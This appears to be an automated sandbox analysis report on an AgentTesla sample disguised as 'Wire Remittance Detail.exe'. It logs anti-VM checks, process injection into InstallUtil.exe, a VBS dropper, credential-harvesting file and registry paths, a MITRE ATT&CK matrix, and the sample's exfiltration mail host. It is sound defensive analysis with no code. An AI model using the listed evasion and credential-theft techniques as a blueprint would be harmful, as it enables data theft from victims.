                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95615Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95032Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99204Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98954Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98829Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98704Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98414Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98167Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93860Jump to behavior
                    Source: AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: wscript.exe, 00000003.00000003.1213273569.000001C889D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: AssemblyFullName.exe, 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                    Source: wscript.exe, 00000003.00000003.1213273569.000001C889D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^$
                    Source: InstallUtil.exe, 00000006.00000002.2329364960.0000000005CFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: InstallUtil.exe, 00000002.00000002.1241030016.0000000006192000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll88
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 621008Jump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe "C:\Users\user\AppData\Roaming\AssemblyFullName.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeQueries volume information: C:\Users\user\Desktop\Wire Remittance Detail.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeQueries volume information: C:\Users\user\AppData\Roaming\AssemblyFullName.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Wire Remittance Detail.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7136, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7136, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.44aee70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.AssemblyFullName.exe.4337120.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7136, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		111
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		311
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635011 Sample: Wire Remittance Detail.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 33 mail.iaa-airferight.com 2->33 35 api.ipify.org 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 10 other signatures 2->43 8 wscript.exe 1 2->8         started        11 Wire Remittance Detail.exe 5 2->11         started        signatures3 process4 file5 53 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->53 14 AssemblyFullName.exe 2 8->14         started        23 C:\Users\user\...\AssemblyFullName.exe, PE32 11->23 dropped 25 C:\Users\user\...\AssemblyFullName.vbs, ASCII 11->25 dropped 27 C:\...\AssemblyFullName.exe:Zone.Identifier, ASCII 11->27 dropped 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->55 17 InstallUtil.exe 15 2 11->17         started        signatures6 process7 dnsIp8 57 Antivirus detection for dropped file 14->57 59 Multi AV Scanner detection for dropped file 14->59 61 Writes to foreign memory regions 14->61 63 Injects a PE file into a foreign processes 14->63 20 InstallUtil.exe 2 14->20         started        29 api.ipify.org 104.26.13.205, 443, 49681, 49685 CLOUDFLARENETUS United States 17->29 31 mail.iaa-airferight.com 46.175.148.58, 25 ASLAGIDKOM-NETUA Ukraine 17->31 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->65 67 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->67 69 Tries to steal Mail credentials (via file / registry access) 17->69 signatures9 process10 signatures11 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->45 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal ftp login credentials 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51

